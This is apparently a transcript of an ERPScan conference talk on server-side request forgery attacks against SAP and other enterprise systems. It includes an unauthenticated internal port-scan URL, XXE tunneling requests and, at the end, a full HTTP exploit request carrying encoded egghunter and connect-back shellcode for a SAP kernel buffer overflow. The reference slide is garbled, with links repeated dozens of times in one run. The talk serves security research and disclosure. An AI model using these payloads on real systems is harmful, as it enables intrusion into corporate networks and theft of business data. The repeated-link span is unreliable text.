invest in security - erpscan • ssrfsocks by iamultra: a tool for erpscan’svulnerability in...
TRANSCRIPT
-
Invest in securityto secure investments
SSRF VS. BUSINESS-CRITICAL APPLICATIONSPART 2: NEW VECTORS AND CONNECT-BACK ATTACKS
Alexander Polyakov CTO at ERPScan
-
Alexander Polyakov
Business application security expert
-
ERPScan
Leading SAP AG partner in the field of discovering security vulnerabilities by the number of found vulnerabilities
Developers of ERPScan Security Scanner for SAP
Leader by the number of acknowledgements from SAP ( >60 )
Invited to talk at more than 30 key security conferencesworldwide (BlackHat (US/EU/DC/UAE), RSA, Defcon, HITB)
First to release software for NetWeaver J2EE platform assessment
Research team with experience in different areas of security fromERP and web security to mobile, embedded devices, and criticalinfrastructure, accumulating their knowledge in SAP research.
Conducted workshops for SAP
-
Agenda
Enterprise applications SSRF
History Types
SSRF Proxy attacks Example of Attacking SAP with SSRF
SSRF Connect-back attacks Examples
XXE Scanner Conclusion
-
Enterprise applications: Definitions
Business software is generally any software that helps businessto increase its efficiency or measure its performance
Small (MS Office)
Medium (CRM, Shops)
Enterprise (ERP, BW)
-
Why are they critical?
Any information an attacker might want, be it a cybercriminal,industrial spy or competitor, is stored in corporate ERP. Thisinformation can include financial, customer or public relations,intellectual property, personally identifiable information andmore. Industrial espionage, sabotage, and fraud or insiderembezzlement may be very effective if targeted at the victimsERP system, and they can cause significant damage to thebusiness.
-
Business-critical systems architecture
Located in a secure subnetwork
Secured by firewalls
Monitored by IDS systems
Regularly patched
-
Noahhh
-
But lets assume that they are,because it will be much more
interesting to attack them
-
Secure corporate network
The
Internet
Industrial network
ERP network
Corporate network
-
But wait.There must be some links!
-
Real corporate network
The
Internet Industrial network
ERP network
Corporate network
-
AndAttackers can use them!
-
Corporate network attack scenario
The
Internet Industrial network
ERP network
Corporate network
-
But how?
-
SSRF History: the beginning
SSRF: Server Side Request Forgery.
An attack which was discussed in 2008 with very little information about theory and practical examples.
Like any new term, SSRF doesnt show us something completely new like a new type of vulnerability. SSRF-style attacks were known before.
-
SSRF History: Basics
We send Packet A to Service A
Service A initiates Packet B to service B
Services can be on the same host or on different hosts
We can manipulate some fields of packet B within packet A
Various SSRF attacks depend on how many fields we can control in packet B
Packet A
Packet B
-
SSRF history
DeralHeiland Shmoocon 2008
Web Portals Gateway To Information Or A Hole In Our Perimeter Defenses
Spiderlabs 2012
http://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.html
Vorontsov 2012
SSRF via XXE http://2012.caro.org/presentations/attacks-on-large-modern-web-applications
ERPScan (Polyakov,Chastuchin) - SSRF vs business critical applications (Gopher protocol) 2012 august
http://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdf
ssrfsocks by iamultra: a tool for ERPScans vulnerability in Gopher
https://github.com/iamultra/ssrfsocks 2012 august
Less Known Web App Vulnerabilities: Real World Examples. (From ERPScan paper) 2012 October
ERPScan - Gopher SSRF in JVM advisory October 2012 http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/
ERPScan (Polyakov) - SSRF 2.0 http://erpscan.com/category/publications/
New research will be published at ZeroNights http://2012.zeronights.org/
http://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://www.layereddefense.com/media/dhsmhoo08.ppthttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://blog.spiderlabs.com/2012/05/too-xxe-for-my-shirt.htmlhttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://2012.caro.org/presentations/attacks-on-large-modern-web-applicationshttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttp://erpscan.com/wp-content/uploads/2012/08/SSRF-vs-business-critical-applications.-XXE-Tunelling-in-SAP.pdfhttps://github.com/iamultra/ssrfsockshttps://github.com/iamultra/ssrfsockshttps://github.com/iamultra/ssrfsockshttps://github.com/iamultra/ssrfsockshttps://github.com/iamultra/ssrfsockshttp://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/advisories/dsecrg-12-039-oracle-jvm-gopher-protocol-ssrf/http://erpscan.com/category/publications/http://erpscan.com/category/publications/http://erpscan.com/category/publications/http://erpscan.com/category/publications/http://erpscan.com/category/publications/http://2012.zeronights.org/http://2012.zeronights.org/http://2012.zeronights.org/http://2012.zeronights.org/http://2012.zeronights.org/http://2012.zeronights.org/http://2012.zeronights.org/http://2012.zeronights.org/
-
Ideal SSRF
The idea is to find victim server interfaces that will allowsending packets initiated by the victim server to the localhostinterface of the victim server or to another server secured by afirewall from outside. Ideally, this interface :
Must allow sending any packet to any host and any port
Must be accessed remotely without authentication
-
Why?
In this research, we wanted to :
Collect the information about SSRF attacks
Categorize them
Show examples of SSRF attacks
Show new potential and real SSRF vectors
-
SSRF
Trusted SSRFRemote
SSRF
SSRF proxy attack SSRF back connect
SSRF counter attack
Local SSRF
Simp
le
Partial
Full
-
SSRF proxy attack
Secure network
Corporate network
Packet BPacket BPacket A
-
SSRF back connect attack
Packet B
Packet C
Packet BPacket A
-
SSRF proxy attacks
Trusted SSRF (Can forge requests to remote services butonly to predefined ones)
Remote SSRF (Can forge requests to any remote IP andport)
Simple Remote SSRF (No control on app level)
Partial Remote SSRF (Control in some fields of app level)
Full Remote SSRF (Control on app level)
-
Exploiting SSRF
For every SSRF attack, there must be at least 2 vulnerabilities to successfully trigger the attack:
First vulnerability Functionality to create/use links (for trusted SSRF)
Functionality in some service on Server A which allows us to send remote packets (for other types of SSRF)
Second vulnerability Insecure link (for trusted SSRF)
Vuln. in service on server B (for remote SSRF )
Vuln. in localhost service on server A (for local SSRF)
Vuln. in client app. on server A (for back-connect SSRF)
-
Trusted SSRF
Trusted SSRF in Oracle
SELECT * FROM myTable@HostB
EXECUTE Schema.Package.Procedure('Parameter')@HostB
Trusted SSRF in MSSQL
Select * from openquery(HostB,'select * from @@version')]
Trusted SSRF in SAP NetWeaver
SM59 transaction
Also Lotus Domino and others
Not so interesting
-
First vulnerability (functionality on Server A)
Unusual calls
Multiprotocol calls (URI) In engines (XML)
In applications
UNC calls
HTTP calls
FTP calls
LDAP calls
SSH calls
Other calls
-
Functionality on server A: Unusual calls
Remote port scan
SAP NetWeaver wsnavigator (sapnote 1394544,871394)
SAP NetWeaver ipcpricing (sapnote 1545883)
SAP BusinessObjects viewrpt (sapnote 1583610)
Remote password bruteforce
SAP NetWeaver (NDA)
Other
Information disclosure by testing if a file or a directory exists
Timing attacks
Etc????
Very application-specific. Can be very interesting
-
Example of unusual calls
It is possible to scan internal network from the Internet
Authentication is not required
SAP NetWeaver J2EE engine is vulnerable
/ipcpricing/ui/BufferOverview.jsp?server=172.16.0.13
& port=31337
& dispatcher=
& targetClient=
& view=
-
Port scan via ipcpricing JSP
Host is not alive
Port closed
HTTP port
SAP port
-
Multiprotocol calls (in XML)
XML seems to be the new TCP.
Almost all big projects use XML-based data transfer.
There are a lot of XML-based protocols with different options tocall external resources and thus conduct SSRF attacks.
There is at least one element type which fits almost all XML-based schemes. The type is: xsd:anyURI.
URIs also encompass URLs of other schemes (e.g., FTP, gopher,telnet), as well as URNs.
Popular URIs: http:// ftp:// telnet:// ..
-
Multiprotocol calls in XML
XML XML External Entity XSD definition
XML Encryption XML Signature WS-Policy From WS-Security WS-Addressing XBRL ODATA (edmx)
ODATA External Entity Other
BPEL STRATML
-
XML Encryption
1.
2.
3.
4.
Successfully Tested
-
XML Signature
1.
Successfully Tested
-
WS-Addressing
1.
http://ServerB/
2. http://ServerB/
Successfully Tested (0-day)
-
WS-Policy
1.
Not Tested
-
WS-Security
1.
-
WS-Federation
1.
2. http://ServerB/
3. http://ServerB/
4.
http://ServerB/
Not Tested
-
XBRL
1.
2.
Not Tested
-
ODATA (edmx)
The edmx:Reference element specifies external entity models referenced by this EDMX. Referenced models are available in their entirety to referencing models. All entity types, complex types and other named elements in a referenced model can be accessed from a referencing model.
http://www.odata.org/media/30002/OData%20CSDL%20Definition.html
No examples of edmx in the wild (new protocol)
http://www.odata.org/media/30002/OData CSDL Definition.html
-
ODATA
1.
2.
Still no products for testing (0-day)
-
STRATML
1. http://ServerB/
Not tested
-
SOAP
SoapAction?
No Examples
-
Multiprotocol Calls in Applications
-
Multiprotocol calls
Not so usual but a potentially big area
Oracle Database
UTL_TCP
-
UNC calls: threats
Sure you can call UNC path if you have a universal URI
But if there is no universal engine you can search for UNC
UNC calls can be used for:
conducting SMBRelay attack
reading files from shared folders (open or trusted)
other vectors which will be discussed later.
Check SMBRelay bible posts from http://erpscan.com/?s=SMBRelay+Bible&x=0&y=0
http://erpscan.com/?s=SMBRelay+Bible&x=0&y=0
-
UNC calls: applications
SAP NetWeaver
From SAP webservices (sapnote 1503579,1498575)
From RFC functions (sapnote 1554030)
From SAP transactions, reports (sapnote 1583286)
Oracle Database
Listener
Database commands such as ctxsys.context
MsSQL Database
MySQL Database
FTP servers
IBM Lotus Domino controller
VMWare
Anything that uses XML engine
And much more
-
HTTP calls: threats
Sure you can call HTTP path if you have a universal URI
But if there is no universal engine, you can search for HTTP
HTTP calls can be used for conducting wide range of attacks on systems which are in one network with Server A
DoS
Inf disclosure
Unauthorized access (like invoker servlets)
Bruteforcing (users/directories/pages)
Fingerprinting
etc
Examples of HTTP attacks are beyond the current research
-
HTTP calls: applications
SAP NetWeaver
Transactions
Reports
RFC commands
Portal portlets
Portal links
Oracle Database
UTL_HTTP
MsSQL Database
PostgreSQL Database
Anything that uses XML engine
And much more
-
FTP calls threats
Sure you can call FTP path if you have a universal URI
FTP is usually possible whenever HTTP is possible
But if there is no universal engine, you can search for FTP
FTP calls can be used to conduct wide range of attacks on systems which are in one network with Server A
DoS
Inf disclosure
Unauthorized access (like invoker servlets)
Bruteforcing (users/directories/pages)
Fingerprinting
etc.
Examples of FTP attacks are beyond the current research
-
FTP calls: applications
SAP NetWeaver
Transactions
Reports
RFC commands
Oracle Database
UTL_HTTP
PostgreSQL Database
Anything that uses XML engine
And much more
-
Other calls
ldap:// Bruteforce logins
Information disclosure
jar:// Information disclosure
mailto:
ssh2:// Bruteforce logins
Rce?
gopher:// XXE Tunneling
.
Just the most popular ones
-
Exploiting Gopher (Example)
-
XXE Tunneling (Example)
Server B (ERP, HR, BW etc.)
Server A (Portal or XI)
192.168.0.1
172.16.0.1
POST /XISOAPAdapter/servlet/com.sap.aii.af.mp.soap.web.DilbertMSG?format=post HTTP/1.1Host: 192.168.0.1:8000
-
XXE Tunneling to Buffer Overflow (Example)
A buffer overflow vulnerability found by Virtual Forge in ABAP Kernel (fixed in sapnote 1487330)
Hard to exploit because it requires calling an RFC function which calls Kernel function
But even such a complex attack can be exploited
Get ready for the hardcore
-
XXE Tunneling to Buffer Overflow (Hint 1)
Shellcode size is limited to 255 bytes (name parameter)
As we dont have direct connection to the Internet from the vulnerable system, we want to use DNS tunneling shellcode to connect back
But the XML engine saves some XML data in RWX memory
So we can use egghunter
Any shellcode can be uploaded
-
XXE Tunneling to Buffer Overflow: Packet B
POST /sap/bc/soap/rfc?sap-client=000 HTTP/1.1Authorization: Basic U1FQKjowMjA3NTk3==Host: company.com:80User-Agent: ERPSCAN Pentesting tool v 0.2Content-Type: text/xml; charset=utf-8Cookie: sap-client=000Content-Length: 2271
dsecdsechffffk4diFkDwj02Dwk0D7AuEE4y4O3f2s3a064M7n2M0e0P2N5k054N4r4n0G4z3c4M3O4o8M4q0F3417005O1n7L3m0Z0O0J4l8O0j0y7L5m3E2r0b0m0E1O4w0Z3z3B4Z0r2H3b3G7m8n0p3B1N1m4Q8P4s2K4W4C8L3v3U3h5O0t3B3h3i3Z7k0a0q3D0F0p4k2H3l0n3h5L0u7k3P2p0018058N0a3q1K8L4Q2m1O0D8K3R0H2v0c8m5p2t5o4z0K3r7o0S4s0s3y4y3Z5p0Y5K0c053q5M0h3q4t3B0d0D3n4N0G3p082L4s1K5o3q012s4z2H0y1k4C0B153X3j0G4n2J0X0W7o3K2Z260j2N4j0x2q2H4S0w030g323h3i127N165n3Z0W4N390Y2q4z4o2o3r0U3t2o0a3p4o3T0x4k315N3i0I3q164I0Q0p8O3A07040M0A3u4P3A7p3B2t058n3Q02VTX10X41PZ41H4A4K1TG91TGFVTZ32PZNBFZDWE02DWF0D71DJE5I4N3V6340065M2Z6M1R112NOK066N5G4Z0C5J425J3N8N8M5AML4D17015OKN7M3X0Z1K0J388N0Z1N0MOL3B621S1Q1T1O5GKK3JJO4P1E0X423GMMNO6P3B141M4Q3A5C7N4W4C8M9R3U485HK03B49499J2Z0V1F3EML0QJK2O482N494M1D173Q110018049N7J401K9L9X101O0N3Z450J161T5M90649U4ZMM3S9Y1C5C1C9Y3S3Z300Y5K1X2D9P4M6M9T5D3B1T0D9N4O0M3T082L5D2KOO9V0J0W5J2H1N7Z4D62LO3H9O1FJN7M0Y1PMO3J0G2I1ZLO3D0X612O4T2C010G353948137O074X4V0W4O5Z68615JJOLO9R0T9ULO1V8K384E1HJK305N44KP9RKK4I0Q6P3U3J2F032J0A9W4S4Q2A9U69659R4A06aaaaaaaaaaaaaaaaaaaaa